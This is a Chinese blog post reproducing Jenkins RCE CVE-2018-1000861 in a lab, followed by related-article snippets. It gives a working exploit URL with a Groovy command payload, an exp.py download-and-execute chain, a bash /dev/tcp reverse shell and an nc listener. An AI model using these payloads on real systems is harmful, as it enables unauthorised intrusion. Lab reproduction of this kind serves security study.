Jenkins远程命令执行-CVE-2018-1000861

最新推荐文章于 2024-03-16 16:21:11 发布
最新推荐文章于 2024-03-16 16:21:11 发布
阅读量628 收藏
点赞数
分类专栏: web中间件漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901038/article/details/107733015
版权

1、漏洞环境

环境名称: jenkins-cve_2018_1000861
攻击机:kali

2、漏洞复现

2.1、方法一

我们直接在浏然器中输入:

http://192.168.20.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
?sandbox=true&value=public class x {public x(){"touch /tmp/CVE-2018-1000861_is_success".execute()}}

没有回显。
在这里插入图片描述
进入docker查看,是否回显成功。

docker-compose exec jenkins bash

在这里插入图片描述

2.2、方法二

原文链接:https://www.cnblogs.com/cwkiller/p/12578924.html

orang的exp

https://github.com/orangetw/awesome-jenkins-rce-2019
  • (1).在我们的web服务器写txt文本内容为:
bash -i >& /dev/tcp/*.*.*.*/2333 0>&1
  • (2).使用exp.py执行以下命令下载文件
python exp.py http://192.168.222.143:8080/ "curl -o /tmp/1.sh http://192.168.0.103:85/1.txt"
  • (3).然后在我们接收shell的机器上监听之前写的端口
nc -lvvp 2333
  • (4).直接bash执行我们下载的脚本
python exp.py http://192.168.222.143:8080/ "bash /tmp/1.sh"

(5).回到监听端口的机器
在这里插入图片描述
可以看到已经成功获取到了shell。

3、参考链接

https://www.cnblogs.com/cwkiller/p/12578924.html
https://blog.csdn.net/xuandao_ahfengren/article/details/106586602
https://github.com/orangetw/awesome-jenkins-rce-2019/blob/master/README.md

xor0ne_10_01
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jenkins远程命令执行漏洞(CVE-2018-1000861
黑白的博客
12-07 2772
声明 好好学习,天天向上 漏洞描述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 影
jenkins 执行远程linux命令
08-15
jenkins 执行远程linux命令jenkins 执行远程linux命令jenkins 执行远程linux命令
jenkins远程执行(ssh、curl)
weixin_54361902的博客
07-11 764
实现201服务器完成构建步骤后自动对202服务器进行远程shell指令的操作,202服务器的jenkins接收到后项目会自动开始构建。在 jenkins 插件管理中安装插件。
jenkins教程:Publish Over SSH插件远程ssh执行命令
学亮编程手记
09-12 2730
jenkins 构建完成后需要一键发布,结构如下A服务器 svnB服务器 jenkinsC服务器 应用服务器B从A拉取代码后打包成war,然后向C服务器拷贝war包这里解决的就是远程拷贝问题。
Jenkins构建(8):Jenkins 执行远程shell :Send files or execute commands over SSH
fen_fen的专栏
03-10 1万+
Jenkins 执行远程shell :Send files or execute commands over SSH 1、环境配置 管理Jenkins-->Configure System 模块:Publish over SSH,新增SSH Server,输入Hostname,Username,Password 点击Test Configuration,提示:Success 代表SSH连通远端服务器。 2、构建,选择刚新增的服务器 在Exec command输入shell脚本 .
shell命令或脚本 调用远程jenkins并运行job
StudyHappiness的博客
03-15 2004
shell命令调用执行,远程Jenkins中的任务
jenkins-plugin-lan-svn
07-25
本文将详细介绍"jenkins-plugin-lan-svn"这一插件,及其与Subversion(简称SVN)的结合使用,以帮助开发者更高效地管理代码版本。 标题"jenkins-plugin-lan-svn"指向的是Jenkins的一个插件,主要目的是实现本地...
jenkins-update-center:詹金斯镜像更新中心生成器
02-21
詹金斯更新中心 詹金斯镜更新中心生成器 更新时间 每天凌晨1点UTC更新 镜像站点 腾讯 华为 清华 ustc 位 文件update-center.json ...wget https://cdn.jsdelivr.net/gh/lework/jenkins-update-center/rootC
ansible-role-jenkins:Ansible角色-Jenkins CI
01-30
安装命令通常为:`ansible-galaxy install ansible-role-jenkins`。之后,在Ansible playbook中引用该角色,以配置和部署Jenkins服务。 4. **配置变量** `ansible-role-jenkins`角色允许用户通过变量进行定制化...
jenkins-2.249-1.1.noarch.rpm
09-21
jenkins2.249安装包,rpm安装方式,
Jenkins执行shell命令(本地和远程执行)
热门推荐
fen_fen的专栏
12-22 2万+
jenkins执行shell命令 执行本地命令或shell脚本 执行本地的一个脚本 3.执行远程机器命令或shell脚本 3.1.ssh 插件要安装好配置ssh权限 3.2.点击“系统管理”-->“系统配置”, 添加权限(这里使用的是用户密码)后,点击check connection,Successfull connection代表连接成功。 4.执行远程机器10.1.1.74的shell脚本 test.sh #!/bin/bash cd /home/cg pwd e
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 544
Jenkins远程命令执行漏洞(CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是
一步步使用jenkins远程执行自动化测试脚本
最新发布
weixin_44338495的博客
03-16 1435
我使用的是jenkins版本是2.414.2,步骤有点多会有点啰嗦哦。
Jenkins远程命令执行漏洞(CVE-2018-1000861)
锋刃科技的博客
06-06 5557
1. 漏洞简介 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令 2. 影响组件 Jenkins 3. 漏洞指纹 Jenkins 4. Fofa Dork app="Jenkins" 5. 漏洞分析 这里我们是用docker快速搭建 git clone https://github.com/vulhub/vulhub.git cd /root/vulhub/jenkins/CVE-2018-1000861 docker-compose
【漏洞复现】Jenkins远程命令执行漏洞(CVE-2018-1000861
weixin_43486390的博客
12-21 2254
0x01 漏洞介绍 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 0x02 影响版本
漏洞复现----6、Jenkins远程命令执行漏洞(CVE-2018-1000861
七天
11-25 4468
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
JenkinsCVE-2018-1000861学习
公众号shadow sock7
05-22 1894
参考: https://www.lucifaer.com/2019/03/04/Jenkins RCE分析(CVE-2018-1000861分析)/ https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ // 这句将req中的字符串转换成Jenkins自己规范的路由 // 比如这里将/je...
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
攻击者可以利用该漏洞通过SSH连接到Jenkins主机并执行任意命令。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 CVE-2021-28169是Jenkins中的另一个安全漏洞,存在于Jenkins的Windows安装程序中。攻击者可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值